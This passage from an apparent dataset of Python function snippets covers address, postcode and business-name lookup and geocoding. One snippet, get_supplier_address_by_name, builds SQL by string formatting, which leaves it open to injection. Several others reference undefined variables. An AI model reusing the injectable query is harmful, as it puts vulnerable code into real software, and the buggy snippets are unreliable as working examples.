None:\n raise NotFoundException(f'Not found house number {house_number} in result: {response[\"result\"]}')\n \n return address['street']['id'], address['name_ru']\n except requests.RequestException as e:\n raise ParserException(f'Fail make request. query: {query}') from e\n except NotFoundException as e:\n raise ParserException('Invalid result.') from e\n except (KeyError, IndexError) as e:\n raise ParserException(f'Fail get street id or house number. value: {response[\"result\"]}') from e", "def test_can_lookup_postcode(self):\n postcode_to_lookup = \"SW1A 1AA\"\n os_places_key = self.app.config.get(\"OS_PLACES_API_KEY\")\n addresses = AddressLookup(key=os_places_key).by_postcode(postcode_to_lookup)\n self.assertGreater(len(addresses), 0)\n result_postcode = addresses[0].get(\"DPA\", {}).get(\"POSTCODE\")\n self.assertEqual(result_postcode, postcode_to_lookup)", "def find_in_county(cls, county_code, ma_region, pdp_region, name='*'):\n flter = or_(cls.COUNTY_CODE == county_code,\n cls.MA_REGION_CODE == ma_region,\n cls.PDP_REGION_CODE == pdp_region\n )\n if not name == '*':\n look_for = f\"{name.lower()}%\"\n flter = and_(flter, cls.PLAN_NAME.ilike(look_for))\n\n qry = cls.session.query(Plans.PLAN_NAME).filter(flter).distinct(cls.PLAN_NAME).all()\n results = [r.PLAN_NAME for r in qry]\n return results", "def findLocationByCode(cls, code):\r\n return cls.query.filter_by(code = code).first()", "def geocode_zip():\n\n # Get user location \n zipcode = request.args.get('zipcode')\n location_result = client.geocode(zipcode)\n\n # Save needed geolocation in the session\n session['lat'] = location_result[\"results\"][0][\"location\"][\"lat\"]\n session['lng']= location_result[\"results\"][0][\"location\"][\"lng\"]\n\n city = location_result[\"results\"][0][\"address_components\"][\"city\"]\n state = location_result[\"results\"][0][\"address_components\"][\"state\"]\n session['user_facing_location'] = city + \", \" + state\n\n return jsonify(location_result)", "def lookup(name, phonebook):\n\n phonebook_data = read_phonebook(phonebook)\n\n match = False\n for entry_name in phonebook_data:\n if name.lower() in entry_name.lower():\n match = True\n print entry_name, phonebook_data[entry_name]\n\n if not match:\n print \"No matches found.\"", "def geocode(postcode):\n key = current_app.config.get(\"OS_PLACES_API_KEY\")\n formatted_addresses = FormattedAddressLookup(key=key).by_postcode(postcode)\n 
response = [{\"formatted_address\": address} for address in formatted_addresses if address]\n return Response(json.dumps(response), mimetype=\"application/json\")", "def get_closest_station_by_zipcode(zipcode):\n\n station_lookup_method_by_zipcode = lookup_usaf_station_by_zipcode(zipcode)\n try:\n station, warnings, lat, lon = _get_closest_station_by_zcta_ranked(zipcode)\n\n isd_metadata = get_isd_file_metadata(str(station))\n if len(isd_metadata) == 0:\n logging.warning(\"Zipcode %s mapped to station %s, but no ISD metadata was found.\" % (zipcode, station))\n return station_lookup_method_by_zipcode\n\n except UnrecognizedUSAFIDError as e:\n logging.warning(\"Closest station %s is not a recognized station. Using backup-method station %s for zipcode %s instead.\" % (\n str(station),\n station_lookup_method_by_zipcode,\n zipcode))\n return station_lookup_method_by_zipcode\n\n except UnrecognizedZCTAError as e:\n logging.warning(\"Unrecognized ZCTA %s\" % e)\n return None\n\n if str(station) != station_lookup_method_by_zipcode:\n logging.debug(\"Previously would have selected station %s instead of %s for zip code %s\" % (\n station_lookup_method_by_zipcode,\n str(station),\n zipcode))\n\n if warnings:\n logging.warning(\"Station %s is %d meters over maximum %d meters (%d meters) (zip code %s is at lat/lon %f, %f)\" % (\n str(station),\n int(warnings[0].data['distance_meters'] - warnings[0].data['max_distance_meters']),\n int(warnings[0].data['max_distance_meters']),\n int(warnings[0].data['distance_meters']),\n zipcode,\n lat,\n lon,\n ))\n logging.warning(\"Closest station %s is too far. Using backup-method station %s instead.\" % (\n str(station),\n station_lookup_method_by_zipcode))\n return station_lookup_method_by_zipcode\n\n return str(station)", "def get_zipcode_stations(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n neighborhood_stations = text(\r\n \"\"\"\r\n SELECT\r\n \"name\" as name,\r\n \"addressStreet\" as address,\r\n \"bikesAvailable\" as available_bikes,\r\n v.geom as geom,\r\n ST_X(v.geom) as lon, ST_Y(v.geom)as lat\r\n FROM indego_rt1130 as v\r\n JOIN philly_zipcode as n\r\n ON ST_Intersects(v.geom, n.geom)\r\n WHERE n.code = :name\r\n \"\"\"\r\n )\r\n stations = gpd.read_postgis(neighborhood_stations, con=engine, params={\"name\": name})\r\n return stations", "def show_restaurants(customer_score, seed_number=1, area=None, rank=None, search_key=None,page=1):\n\tcuisine_match = {\n\t\t'american': ['American','Steak','New American','French-American'],\n\t\t'french': ['French','French/Italian','French-American','French| Gluten Free'],\n\t\t'italian': ['Italian','French/Italian'],\n\t\t'asian': ['Asian','Japanese','Middle Eastern','Chinese','Korean','Indian','Thai'],\n\t}\n\trank_match = {'Platinum': 5, 'Gold': 4, 'Silver': 3, 'Bronze': 2, 'Blue': 1}\n\n\tquery = Restaurants.query.filter(Restaurants.dinerscode_rank >= 1, Restaurants.dinerscode_rank <= get_maximum_rank(customer_score), Restaurants.is_deleted == 'N')\n\n\tif area and area != 'ALL':\n\t\tquery = query.filter(Restaurants.area == area)\n \n\tif rank in rank_match:\n\t\tquery = query.filter(Restaurants.dinerscode_rank == rank_match[rank])\n\n\tif search_key:\n\t\tsearch_key = search_key.lower()\n\t\tcuisine_lst = cuisine_match[search_key] if search_key in cuisine_match else (search_key,)\n\t\tquery = query.filter(or_(Restaurants.restaurant_name.ilike('%{}%'.format(search_key)),\n\t\t \t\t Restaurants.cuisine_type.in_(cuisine_lst),\n\t\t \t\t 
Restaurants.cuisine_type.ilike('%{}%'.format(search_key))))\n\t\t# restaurants = [res for res in restaurants if search_key in res.restaurant_name.lower() or search_key in res.cuisine_type.lower()]\n\n\tquery = query.order_by(func.rand(seed_number)).offset(offset).paginate(page, 12)\n\n\treturn query", "def find_with_postcode(self, postcode, predicate=None, skip_cache=False):\n now = _time_ms(datetime.datetime.utcnow())\n if skip_cache or now - self._last_updated > CACHE_LIMIT:\n self._process_stations()\n\n info = self.pc.get(postcode)\n if not info:\n raise InvalidPostcodeException(\"No known postcode %s\" % postcode)\n if 'geo' not in info or not set(['lat', 'lng']) <= set(info['geo']):\n raise InvalidDataException(\"Missing latitude and/or longitude\")\n lat, lng = float(info['geo']['lat']), float(info['geo']['lng'])\n return self.find_with_geo(lat, lng, predicate=predicate)", "def suggestions(self, input, borough_code=None):\n parsed = parser.address(input)\n if borough_code:\n parsed['BOROUGH_CODE'] = borough_code\n self.similiar_names = []\n self.results = []\n if parsed['PHN'] and parsed['STREET']:\n if not parsed['BOROUGH_CODE'] and not parsed['ZIP']:\n # iterate borocodes\n for x in range(1, 6):\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], borough_code=x)\n # try address with borough code if present\n elif parsed['BOROUGH_CODE']:\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], borough_code=parsed['BOROUGH_CODE'])\n # try address with zip code if present\n elif parsed['ZIP']:\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], zip=parsed['ZIP'])\n # validate and retrieve any addresses\n if len(self.similiar_names):\n for name in self.similiar_names:\n self._geocode(phn=parsed['PHN'], street=name['street'], borough_code=name['borough_code'])\n if None in self.results:\n self.results = list(filter(lambda v: v is not None, self.results))\n\n return self.results", "def lookup_muni(name_muni=None, code_muni=None, verbose=False):\n # Get metadata with data url addresses\n temp_meta = utils.select_metadata(geo=\"lookup_muni\", year=2010)\n\n # Read DataFrame available at provided url\n lookup_table = utils.download_metadata(\n temp_meta.loc[:, \"download_path\"].to_list()[0]\n )\n lookup_table[\"name_muni_format\"] = lookup_table[\"name_muni_format\"].str.lower()\n\n # Search by inputs\n if (\n code_muni == \"all\"\n or name_muni == \"all\"\n or (code_muni is None and name_muni is None)\n ):\n if verbose:\n print(f\"Returning results for all municipalities\")\n return lookup_table.iloc[:, :-1]\n\n elif code_muni is not None:\n if name_muni is not None:\n if verbose:\n print(\"Ignoring argument name_muni\")\n try:\n output = lookup_table[lookup_table[\"code_muni\"] == int(code_muni)].iloc[\n :, :-1\n ]\n if verbose:\n print(\n \"Returning results for municipality \",\n f'{output.loc[:, \"name_muni\"].to_list()[0]}',\n )\n return output\n\n except KeyError:\n raise Exception(\n f\"The `code_muni` argument {code_muni}\",\n \"was not found in the database.\",\n )\n\n elif name_muni is not None:\n # Cleaning from accents and turning into lower cases without spaces\n name_muni = utils.strip_accents(str(name_muni).lower().strip())\n output = lookup_table[lookup_table[\"name_muni_format\"] == name_muni]\n\n if len(output) == 0:\n if verbose:\n print(\"Please insert a valid municipality name\")\n raise Exception(\n f\"The `name_muni` argument {name_muni} \",\n \"was not found in the database.\",\n )\n else:\n if verbose:\n print(\n \"Returning results for 
municipality\"\n f'{output.loc[:, \"name_muni\"].to_list()[0]}'\n )\n return output.iloc[:, :-1]\n\n elif code_muni == \"all\" and name_muni == \"all\":\n if verbose:\n print(\"Please insert either a municipality \", \"name or a municipality code\")", "def find_airport_code_by_city(city):\n airports = get_airports()\n\n if city == 'London':\n return 'LHR'\n\n for airport_code in airports:\n if airports[airport_code].lower() == city.lower():\n return airport_code\n return None", "def city_state_zip(**kwargs):\r\n result = \"{city_name}, {state_code}\".format(**kwargs)\r\n if kwargs[\"five_digit_zip_code\"]:\r\n # RLID for some reason has two spaces between state & ZIP.\r\n result += \" {five_digit_zip_code}\".format(**kwargs)\r\n return result", "def postal_code(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"postal_code\")", "def postal_code(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"postal_code\")", "def postal_code(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"postal_code\")", "def findARestaurant(mealType,location):\n\t#1. Use getGeocodeLocation to get the latitude and longitude coordinates of the location string.\n\t# lat_lng = f\"{getGeocodeLocation(location)}\"\n\t# lat_lng_formatted = lat_lng[lat_lng.find(\"(\")+1:lat_lng.find(\")\")]\n\tlatitude, longitude = getGeocodeLocation(location)\n\n\t#2. Use foursquare API to find a nearby restaurant with the latitude, longitude, and mealType strings.\n\t#HINT: format for url will be something like https://api.foursquare.com/v2/venues/search?client_id=CLIENT_ID&client_secret=CLIENT_SECRET&v=20130815&ll=40.7,-74&query=sushi\n\turl = (f\"https://api.foursquare.com/v2/venues/search?client_id={foursquare_client_id}&client_secret={foursquare_client_secret}&v={version}&ll={latitude},{longitude}&intent=browse&radius=10000&query={mealType}&limit=10\")\n\th = httplib2.Http()\n\tresult = json.loads(h.request(url, \"GET\")[1])\n\n\t#3. Grab the first restaurant\n\tvenue_id = result[\"response\"][\"venues\"][0][\"id\"]\n\tvenue_name = result[\"response\"][\"venues\"][0][\"name\"]\n\tvenue_location = result[\"response\"][\"venues\"][0][\"location\"]\n\n\t#4. Get a 300x300 picture of the restaurant using the venue_id (you can change this by altering the 300x300 value in the URL or replacing it with 'orginal' to get the original picture\n\timg_url = (f\"https://api.foursquare.com/v2/venues/{venue_id}/photos?client_id={foursquare_client_id}&client_secret={foursquare_client_secret}&v={version}&group=venue&limit=10\")\n\timg_h = httplib2.Http()\n\timg_result = json.loads(img_h.request(img_url, \"GET\")[1])\n\tprint(img_result)\n\n\t#5. Grab the first image\n\tif len(img_result[\"response\"][\"photos\"][\"items\"]) > 0:\n\t\timg_url = f\"{img_url_pre_lim['prefix']}300x300{img_url_pre_lim['suffix']}\"\n\n\t#6. If no image is available, insert default a image url\n\telse:\n\t\timg_url = \"https://cps-static.rovicorp.com/3/JPG_400/MI0003/711/MI0003711195.jpg?partner=allrovi.com\"\n\n\t#7. 
Return a dictionary containing the restaurant name, address, and image url\t\n\tresult = {\"name\": venue_name, \"address\": venue_location.get(\"address\",\"\"), \"img_url\": img_url}\n\tprint(result)\n\treturn result", "def geo_coder(house_number, boro_code, street_name, zip_code): \r\n wa1 = '1B{}{}{}{}{}C{}{}'.format(rightpad(house_number, 16), rightpad('', 38), boro_code, rightpad('', 10), rightpad(street_name, 32), rightpad('', 113), rightpad(zip_code, 5))\r\n wa1 = rightpad(wa1, 1200)\r\n wa2 = rightpad('', 4300)\r\n NYCGeo.NYCgeo(wa1, wa2)\r\n return wa1, wa2", "def get_supplier_address_by_name(supplier_name: str) -> str:\n # Open a new connection\n db, cursor = db_connector.cursor()\n\n query = \"select address from supplier where name = '{}';\".format(supplier_name)\n cursor.execute(query)\n data = cursor.fetchall()\n db.disconnect()\n return data[0][0]", "def zip_code(self):\n\n\t\telement = Element(driver=self.driver,\n\t\t explicit_wait_time=self.explicit_wait_time,\n\t\t locator=BillPayPageLocator.ZIP_CODE_INPUT)\n\t\treturn element.element_value", "def search(self,name=None):\n\t\taddresses = discover_devices()\n\t\t#if len(addresses) == 0:\n\t\t#\treturn None\n\t\tnames = []\n\t\tfor adr in addresses:\n\t\t\tnames.append(lookup_name(adr))\n\t\t\tif name != None and name == names[-1]:\n\t\t\t\treturn adr\n\n\t\treturn zip(addresses,names)", "def get_full_address(postal_code):\n from app.models.address import Address\n\n address = Address.find_one(postal_code)\n if address:\n return jsonify(address.to_dict())\n return jsonify(dict())", "def test_get_restaurants(self):\n address = {'number': '375',\n 'street': 'Noe St',\n 'city': 'San Francisco',\n 'zip': '94114'}\n\n with self.app.app_context():\n restaurants = ordrin.get_restaurants(address)\n\n # Ordr.in returns a test entry as the first item in the list when\n # when hitting their testing servers.\n entry = restaurants[0]\n self.assertEquals(entry['na'], 'Test Merchant 20130315')\n self.assertEquals(entry['id'], 23917)", "def replace_zip_code(zip_code):\r\n if len(zip_code)>5:\r\n return zip_code[0:5]\r\n else:\r\n return zip_code", "def search():\n\n # Store the 'q' part of the URL as a string called 'q'. Check 'q' loaded, and produce runtime error if not.\n # e.g. '12589'\n q = request.args.get(\"q\")\n if not q:\n raise RuntimeError(\"missing location\")\n\n # Rewrites user input as lowercase\n q = str.lower(q)\n\n # Select the entire row from database 'places' that at least contains the value of 'q' in one of the 'postal_code', 'place_name', or 'admin_name1' fields.\n # e.g. 
[{'country_code':'US','postal_code':'12589'}]\n q_info = db.execute(\"SELECT * FROM places WHERE postal_code LIKE :q OR LOWER(place_name) LIKE :q OR LOWER(admin_name1) LIKE :q LIMIT 10\", q='%'+q+'%')\n\n # Run 'q_info' dict through 'jsonify()' function to convert some elements to JSON compatible(?)\n return jsonify(q_info)", "def zipcode_validation(add):\r\n lng=get_address(add)[1]\r\n lat=get_address(add)[0]\r\n engine = get_sql_engine()\r\n query = text(\r\n \"\"\"\r\n SELECT\r\n code\r\n FROM philly_zipcode\r\n WHERE ST_Intersects(geom, ST_SetSRID(ST_MakePoint(:lng, :lat), 4326))\r\n \"\"\"\r\n )\r\n resp = engine.execute(query,lng=lng, lat=lat).fetchall()\r\n return resp", "def search():\n # q is the name of the http parameter\n request.args.get(\"q\")\n\n #check for missing arguments\n if not(request.args.get(\"q\")):\n raise RuntimeError(\"Missing geo!\")\n\n #\"%\":match any number of characters\n q=request.args.get(\"q\") + \"%\"\n\n #retrieve data from database\n rows=db.execute(\"SELECT * from places WHERE postal_code LIKE :pc OR place_name LIKE :city OR admin_name1 LIKE :state\", pc=q,city=q,state=q)\n\n return jsonify(rows)", "def search_food(cls, name):\n obj = cls.objects(name=name).first()\n return obj", "def get_city_by_name(request, city_prefix):\n cities = City.objects.filter(city_name__istartswith=city_prefix)[:5]\n serializer = AllCitiesSerializer(cities, many=True)\n return Response(serializer.data)", "def zipcode(self, zipcode):\n self._zipcode = zipcode", "def search_zipcode(driver, zipcode, links_file, min_page):\n time.sleep(LOADING_TIME)\n driver = fill_forms(driver, zipcode)\n\n # If a minimum page number was inputted, go to that url directly\n if min_page:\n url = driver.current_url\n page_url = url.split('&ns=1')[0] + '&start=' + str((min_page - 1) * 10)\n driver.get(page_url)\n\n source = driver.page_source\n soup = BeautifulSoup(source, \"html.parser\")\n \n # If it hit a captcha, stop everything\n if check_captcha(soup):\n sys.exit('Hit Captcha at zipcode ' + zipcode)\n\n # If it didn't find anything for that zip code, skip it\n if not soup.find(text = \"Sorry, but we didn't understand the location you entered.\"):\n # Go to each business link on search page\n driver = go_through_businesses(driver, soup, links_file, zipcode)\n\n # Go to next page of businesses in search, if there is a next page\n while True:\n try:\n # next_tag = driver.find_element_by_xpath(\"//a[@class='page-option prev-next next']\")\n next_tag = driver.find_element_by_xpath(\"//a[@class='u-decoration-none next pagination-links_anchor']\")\n # If there's no next button, you're done\n except:\n break\n else:\n driver.execute_script(\"return arguments[0].scrollIntoView();\", next_tag)\n time.sleep(LOADING_TIME)\n\n next_tag.click()\n time.sleep(LOADING_TIME)\n source = driver.page_source\n soup = BeautifulSoup(source, \"html.parser\")\n driver = go_through_businesses(driver, soup, links_file, zipcode)\n\n return driver", "def query_business_name():\n print()\n business_name = input(\n 'Please enter full business name or type \"back\" or \"quit\": ')\n print()\n if business_name == \"quit\":\n print(\"Goodbye!\")\n sys.exit()\n if business_name == \"back\":\n return \"back\"\n\n business_object = business_col.find_one({\"name\": business_name})\n if business_object is None:\n print(\"No business found with given name.\")\n\n return business_object", "def zipcode(self, zipcode):\n if zipcode is None:\n raise ValueError(\"Invalid value for `zipcode`, must not be `None`\") # noqa: E501\n\n 
self._zipcode = zipcode", "def get_zipcode_takeouts(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n zipcode_takeouts = text(\r\n \"\"\"\r\n SELECT\r\n \"NAME\" as name, \"ADDRESS\" as address,\r\n geom, ST_X(geom) as lon, ST_Y(geom)as lat\r\n FROM chinese_takeout\r\n WHERE \"ZIP\" = :name\r\n\r\n \"\"\"\r\n )\r\n ctakeouts = gpd.read_postgis(zipcode_takeouts, con=engine, params={\"name\": name})\r\n return ctakeouts", "def retrieve_location(self, street, zip, city, country):\n \n query = u\"%s, %s, %s\" %(street, city, country)\n query = urllib.quote(query.encode(\"utf-8\"))\n\n url = \"https://api.mapbox.com/v4/geocode/mapbox.places/%s.json?access_token=%s\" %(query, self.config.mapbox_access_token)\n response = requests.get(url)\n if response.status_code!=200:\n raise LocationNotFound()\n\n data = response.json()['features']\n\n if len(data)==0:\n query = u\"%s, %s\" %(city, country)\n query = urllib.quote(query.encode(\"utf-8\"))\n\n # trying again but only with city\n url = \"https://api.mapbox.com/v4/geocode/mapbox_places/%s.json?access_token=%s\" %(query, self.config.mapbox_access_token)\n data = requests.get(url).json()\n data = data['features']\n\n if len(data)==0:\n raise LocationNotFound()\n\n # for some reason in geojson it is (long,lat). Oh yeah\n return tuple(reversed(data[0]['center']))", "def run_script():\n var=raw_input(\"Enter a Zipcode: \")\n address='http://www.uszip.com/zip/'+var\n conn=urllib.urlopen(address)\n t=[]\n for line in conn.fp:\n\tline=line.strip()\n\tif '<title>' in line:\n\t line.split()\n\t print line[7:-16]\n\tif 'Total population' in line:\n\t line=line.strip('z')\n\t loc=line.index('Total population')\n\t loc2=line.index('<span')\n\t print line[(loc+25):loc2]", "def principal_zip_code(self, principal_zip_code):\n\n self._principal_zip_code = principal_zip_code", "def find_address():\n while True:\n business_object = query_business_name()\n if business_object == \"back\":\n return\n elif business_object is None:\n continue\n\n print(f'{business_object[\"name\"]}\\'s address is:'\n f'{business_object[\"address\"]}, {business_object[\"city\"]} '\n f'{business_object[\"state\"]}')", "def postal_code(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"postal_code\")", "def fuzzy_pcode(\n self, countryiso3: str, name: str, logname: Optional[str] = None\n ) -> Optional[str]:\n if (\n self.countries_fuzzy_try is not None\n and countryiso3 not in self.countries_fuzzy_try\n ):\n if logname:\n self.ignored.add((logname, countryiso3))\n return None\n name_to_pcode = self.name_to_pcode.get(countryiso3)\n if not name_to_pcode:\n if logname:\n self.errors.add((logname, countryiso3))\n return None\n adm_name_lookup = clean_name(name)\n adm_name_lookup2 = multiple_replace(\n adm_name_lookup, self.admin_name_replacements\n )\n pcode = name_to_pcode.get(\n adm_name_lookup, name_to_pcode.get(adm_name_lookup2)\n )\n if not pcode and name.lower() in self.admin_fuzzy_dont:\n if logname:\n self.ignored.add((logname, countryiso3, name))\n return None\n if not pcode:\n for map_name in name_to_pcode:\n if adm_name_lookup in map_name:\n pcode = name_to_pcode[map_name]\n if logname:\n self.matches.add(\n (\n logname,\n countryiso3,\n name,\n self.pcode_to_name[pcode],\n \"substring\",\n )\n )\n break\n for map_name in name_to_pcode:\n if adm_name_lookup2 in map_name:\n pcode = name_to_pcode[map_name]\n if logname:\n self.matches.add(\n (\n logname,\n countryiso3,\n name,\n self.pcode_to_name[pcode],\n \"substring\",\n )\n )\n break\n if not 
pcode:\n map_names = list(name_to_pcode.keys())\n lower_mapnames = [x.lower() for x in map_names]\n\n def al_transform_1(name):\n if name[:3] == \"al \":\n return f\"ad {name[3:]}\"\n else:\n return None\n\n def al_transform_2(name):\n if name[:3] == \"al \":\n return name[3:]\n else:\n return None\n\n matching_index = self.phonetics.match(\n lower_mapnames,\n adm_name_lookup,\n alternative_name=adm_name_lookup2,\n transform_possible_names=[al_transform_1, al_transform_2],\n )\n\n if matching_index is None:\n if logname:\n self.errors.add((logname, countryiso3, name))\n return None\n\n map_name = map_names[matching_index]\n pcode = name_to_pcode[map_name]\n if logname:\n self.matches.add(\n (\n logname,\n countryiso3,\n name,\n self.pcode_to_name[pcode],\n \"fuzzy\",\n )\n )\n return pcode", "def _extract_zipcode(self):\n self.col_etl = self.col_etl.apply(lambda x: x[0:2])\n self.col_etl.name = 'deliv_sector'", "def zip_code(self, value):\n regex = config.get('validators', 'zip_code')\n zipcode = re.search(regex,\n value)\n if not zipcode:\n raise ZipCodeError(\"ZipCodeError: 'zip_code' must be 5 non-float digits\")\n else:\n self._zip_code = value", "def search_for_customer(f_name: str, l_name: str):\n return cr.search_for_customer(f_name=f_name, l_name=l_name)", "async def async_query_locations(self,\n zip_code: str = None,\n latitude: str = None,\n longitude: str = None):\n\n location_url = f\"{API_BASE_URL}/locations\"\n headers = {\n \"Accept\": \"application/json\"\n }\n params = {}\n if latitude and longitude:\n params[\"filter.lat.near\"] = latitude\n params[\"filter.lon.near\"] = longitude\n elif zip_code:\n params[\"filter.zipCode.near\"] = zip_code\n else:\n params['filter.lat.near'] = str(self._hass.config.latitude)\n params['filter.lon.near'] = str(self._hass.config.longitude)\n\n try:\n location_resp = await self._oauth_session.async_request('GET',\n location_url,\n params=params,\n headers=headers)\n location_resp.raise_for_status()\n json_response = await location_resp.json()\n locations = [\n {\n 'locationId': item['locationId'],\n 'name': item['name']\n }\n for item\n in json_response['data']]\n return locations\n except Exception as ex:\n _LOGGER.error(\"Unable to retrieve locations: %s\",\n str(ex))\n return None", "def get_address_by_name(name, limit):\n request = \"{}/{}?key={}&q={}&type=json&limit={}\".format(config.GEOCODE_URL, config.GEOCODE_SEARCH_PATH, config.GEOCODE_KEY, name, limit)\n response = requests.get(request).json()\n return response", "def list_near_postcode(code):\n index_postcode = \"\".join(code.split()).upper()\n postcode = models.Postcode.query.get(index_postcode)\n\n if postcode is None:\n raise NotFound(\n Markup(\"Postcode <strong>{}</strong> does not exist.\").format(code)\n )\n if postcode.text != code:\n # Redirect to correct URL, eg 'W1A+1AA' instead of 'w1a1aa'\n return redirect(url_for(\".list_near_postcode\", code=postcode.text),\n code=302)\n\n stops = postcode.stops_in_range(db.undefer(models.StopPoint.lines))\n groups = _group_lines_stops(stops)\n\n return render_template(\"postcode.html\", postcode=postcode, list_stops=stops,\n groups=groups)", "def zip_code(self):\n return self._zip_code", "def getZipCode(dbpath) -> (int, float, float):\n conn = sqlite3.connect(str(dbpath))\n c = conn.cursor()\n c.execute(\"select zipcode, lat, long from user where id=1\")\n conn.commit()\n zipcode = c.fetchone()\n conn.close()\n return zipcode[0], zipcode[1], zipcode[2]", "def find_zip_code(x):\n i = 0\n j = 4\n for i in range(1,len(x)-6):\n string 
= x[i-1:i+6]\n cond = (string[1:-1].isnumeric(), not string[0].isnumeric(), not string[-1].isnumeric())\n if all(cond):\n return x[i:i+5]", "def _geocode(self, phn, street, borough_code=None, zip=None):\n try:\n r = self._g[self.geofunction](house_number=phn, street=street, borough_code=borough_code, zip=zip)\n self.results.append(r)\n except GeosupportError as ge:\n if 'SIMILAR NAMES' in ge.result[\"Message\"]:\n list_of_street_names = ge.result['List of Street Names']\n r = [{\n 'street': s,\n 'borough_code': borough_code\n } for s in list_of_street_names]\n self.similiar_names.extend(r)", "def Collection_search_name(C:list, name:str) -> list:\r\n restaurants = []\r\n for r in C:\r\n for dish in r.menu:\r\n if name in dish.name:\r\n restaurants.append(r)\r\n return restaurants", "def get_zipcode_markets(add):\r\n name=get_zipcode_names(add)\r\n engine = get_sql_engine()\r\n zipcode_markets = text(\r\n \"\"\"\r\n SELECT\r\n \"NAME\" as name, \"ADDRESS\" as address,\r\n \"TIME\" as time, geom,\r\n ST_X(geom) as lon, ST_Y(geom)as lat\r\n FROM farmers_markets\r\n WHERE \"ZIP\" = :name\r\n \"\"\"\r\n )\r\n fmarkets = gpd.read_postgis(zipcode_markets, con=engine, params={\"name\": name})\r\n return fmarkets", "def schoolNameFromPassCode(pass_code):\n try:\n return Team.objects.get(pass_code=pass_code).organization.name\n except Team.DoesNotExist:\n return None", "def lookup(addr, num, street, city, code, geo_dict, failure_set):\n try:\n address_url = \"https://geocoding.geo.census.gov/geocoder/locations/address?\" + \\\n \"street=\" + str(num) + \"+\" + street.replace(\" \", \"+\") + \"&city=\" + city + \"&zip=\" + \\\n str(code) + \"&benchmark=9&format=json\"\n geo_data = json.load(req.urlopen(address_url).decode('utf-8'))['result']\n except Exception:\n try:\n address_url = \"https://geocoding.geo.census.gov/geocoder/locations/address?\" + \\\n \"street=\" + str(num) + \"+\" + street.replace(\" \", \"+\") + \"&city=\" + city + \"&zip=\" + \\\n str(code) + \"&benchmark=9&format=json\"\n geo_data = json.loads(req.urlopen(address_url).read().decode('utf-8'))['result']\n except Exception as e:\n print(e, addr)\n failure_set.add(addr)\n return None\n if len(geo_data['addressMatches']) == 0:\n print(addr, ': Failure')\n failure_set.add(addr)\n return None\n print(addr, ': Success')\n location = geo_data['addressMatches'][0]['coordinates']\n latlong = ','.join([str(location['y']), str(location['x'])])\n geo_dict[addr] = latlong\n return tuple(float(geo) for geo in latlong.split(','))", "def find(self, text: unicode) -> ghidra.program.model.address.Address:\n ...", "def read_street_city_names(path=work_david, filter_neighborhoods=True,\n fix_alley=True):\n import pandas as pd\n df = pd.read_csv(path/'street_names_israel.csv', encoding=\"cp1255\")\n df.columns = ['city_code', 'city_name', 'street_code', 'street_name']\n df['city_name'] = df['city_name'].str.replace(\n 'תל אביב - יפו', 'תל אביב יפו')\n if filter_neighborhoods:\n df = df[df['street_code'] <= 5999]\n if fix_alley:\n df['street_name'] = df['street_name'].str.replace('סמ ', 'סמטת ')\n return df", "def postal_code(self, instance):\r\n return instance.user.profile.postal_code", "def parse_restaurant_name(text):\n stripped = text.lower()\n\n for name_list in RESTAURANT_NAMES:\n for name in name_list:\n if name.lower() in stripped:\n return name_list[0]\n\n return \"\"", "def get_city(address):\n geolocator = Nominatim(user_agent=\"specify_your_app_name_here\")\n \n while True:\n try:\n location = geolocator.geocode(address)\n break\n except 
Exception:\n None\n \n city = citipy.nearest_city(location.latitude, location.longitude)\n return [city.city_name.title(), city.country_code.title()]", "def findName(zippedFile):\n pp = linesFromZippedFile(zippedFile, 'project.properties')\n if pp:\n return pp[1][:-1].split('=')[1]\n return \"\"", "def get_my_zip_code(\n namespace: Optional[str] = None,\n x_additional_headers: Optional[Dict[str, str]] = None,\n **kwargs\n):\n if namespace is None:\n namespace, error = get_services_namespace()\n if error:\n return None, error\n request = GetMyZipCode.create(\n namespace=namespace,\n )\n return run_request(request, additional_headers=x_additional_headers, **kwargs)", "def get_name(book, phone):\n # поиск в словаре\n if str(type(book)) == \"<class 'dict'>\":\n abonent = book.get(str(phone))\n return abonent\n # поиск в списке\n else:\n for b in book:\n if DEBUG:\n print(b[0], phone, phone==b[0], b[1])\n if b[0]==phone:\n return b[1]\n \n return None", "def searchByName(database):\n firstname=str(input(\"What is his first name :\"))\n usr,find=getByName(database,firstname)\n if find:\n print(usr)", "def GeoLocZip(zip_code, cntry):\r\n nb_error = 0\r\n #Try connection with OSM server\r\n while(nb_error < 100):\r\n try :\r\n #connection succeed\r\n time.sleep(1)\r\n g = geocoder.osm(str(zip_code)+' '+str(cntry))\r\n break\r\n except:\r\n #connection failed\r\n #try again\r\n nb_error += 1\r\n print(\"error req - nb_error : \"+str(nb_error))\r\n continue\r\n #g.osm['x'] = longitude\r\n #g.osm['y'] = latitude\r\n return g.osm['x'], g.osm['y']", "def test_lookup_entry_by_name(self):\n self.phonebook.add(\"Bob\", \"12345\")\n self.assertEqual(\"12345\", self.phonebook.lookup(\"Bob\"))", "def geocode_one(self, postcode: str, address: Optional[str] = None) -> pd.Series:\n if postcode is None and address is None:\n raise utils.GenericException(\"You must pass either postcode or address, or both.\")\n if self.gmaps_key is None:\n self.gmaps_key = self._load_key()\n if self.gmaps_key is not None:\n self.gmaps_client = googlemaps.Client(key=self.gmaps_key)\n if self.cache is None:\n self._load_cache()\n sep = \", \" if address and postcode else \"\"\n postcode = postcode if postcode is not None else \"\"\n address = address if address is not None else \"\"\n search_term = f\"{address}{sep}{postcode}\"\n if search_term in self.cache:\n logging.debug(\"Loading GMaps Geocoder API result from cache: '%s'\", search_term)\n geocode_result = self.cache[search_term]\n else:\n logging.debug(\"Querying Google Maps Geocoder API for '%s'\", search_term)\n if self.gmaps_key is None:\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})\n geocode_result = self.gmaps_client.geocode(search_term, region=\"uk\")\n self.cache[search_term] = geocode_result\n self.cache_modified = True\n if not geocode_result or len(geocode_result) > 1:\n return pd.Series({\"latitude\": np.nan, \"longitude\": np.nan, \"match_status\": 0})\n geometry = 